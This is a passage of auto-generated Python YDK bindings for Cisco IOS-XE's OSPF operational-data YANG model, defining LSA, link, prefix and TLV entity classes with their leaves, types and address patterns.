True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 
'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def 
__setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def 
__setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3PrefixList(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__() self.yang_name = "ospfv3-prefix-list" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. 
attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): """ OSPF multi\-topology interface augmentation .. attribute:: name (key) One of the topology enabled on this interface **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value) class Tlv(Entity): """ Link TLV .. 
attribute:: link_type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_id Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: local_if_ipv4_addr List of local interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: local_remote_ipv4_addr List of remote interface IPv4 addresses **type**\: union of the below types: **type**\: list of str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: list of str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: te_metric TE metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: max_bandwidth Maximum bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: max_reservable_bandwidth Maximum reservable bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. 
attribute:: unreserved_bandwidth Unrseerved bandwidth **type**\: :py:class:`Decimal64<ydk.types.Decimal64>` **range:** \-92233720368547758.08..92233720368547758.07 **config**\: False .. attribute:: admin_group Administrative group/Resource class/Color **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, self).__init__() self.yang_name = "tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])), ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])), ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])), ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])), ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])), ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])), ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])), ]) self.link_type = None self.link_id = None self.local_if_ipv4_addr = [] self.local_remote_ipv4_addr = [] self.te_metric = None self.max_bandwidth = None self.max_reservable_bandwidth = None self.unreserved_bandwidth = None self.admin_group = None self._segment_path = lambda: "tlv" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value) class 
UnknownSubTlv(Entity): """ OSPFv2 Unknown sub TLV .. attribute:: type (key) TLV type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: length TLV length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: value TLV value **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__() self.yang_name = "unknown-sub-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value) class AreaScopeLsa(Entity): """ List OSPF area scope LSA databases .. attribute:: lsa_type (key) LSA Type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link Router LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv3_lsa OSPFv3 LSA **type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>` **config**\: False .. 
                    attribute:: ospfv3_ia_prefix
                    
                    	OSPFv3 intra\-area prefix\-list
                    	**type**\: list of  :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>`
                    
                    	**config**\: False
                    
                    """

                    # YANG module metadata emitted by the bindings generator.
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'

                    def __init__(self):
                        # NOTE(review): auto-generated binding code (ydk-gen, Cisco-IOS-XE-ospf-oper
                        # model, revision 2018-02-01). Regenerate from the YANG model rather than
                        # editing this file by hand.
                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, self).__init__()

                        self.yang_name = "area-scope-lsa"
                        self.yang_parent_name = "link-scope-lsas"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        # This YANG list entry is keyed by (lsa-type, adv-router); both keys
                        # also appear in the _segment_path predicate below.
                        self.ylist_key_names = ['lsa_type','adv_router']
                        # Maps each YANG child node name to (python attribute name, binding class).
                        self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
                        # Leaf descriptors: python name -> (YLeaf(yang type, yang name), accepted python types).
                        self._leafs = OrderedDict([
                            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                            ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                            ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                            ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
                        ])
                        self.lsa_type = None
                        self.adv_router = None
                        self.decoded_completed = None
                        self.raw_data = []
                        # Singleton containers: instantiated eagerly and parented to self.
                        self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
                        self.ospfv2_lsa.parent = self
                        self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

                        self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
                        self.ospfv3_lsa.parent = self
                        self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"

                        # List children start empty; entries are appended by callers/decoders.
                        self.ospfv2_link = YList(self)
                        self.ospfv2_topology = YList(self)
                        self.ospfv2_external = YList(self)
                        self.ospfv3_link = YList(self)
                        self.ospfv3_prefix = YList(self)
                        self.ospfv3_ia_prefix = YList(self)
                        self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
                        # Freeze: after this, attribute writes go through __setattr__ validation.
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        # Delegate attribute writes to Entity._perform_setattr with the
                        # declared leaf names for this class.
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)


                    class Ospfv2Lsa(Entity):
                        """
                        OSPFv2 LSA
                        
                        .. attribute:: header
                        
                        	Decoded OSPFv2 LSA header data
                        	**type**\:  :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>`
                        
                        	**config**\: False
                        
                        ..
attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None 
self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
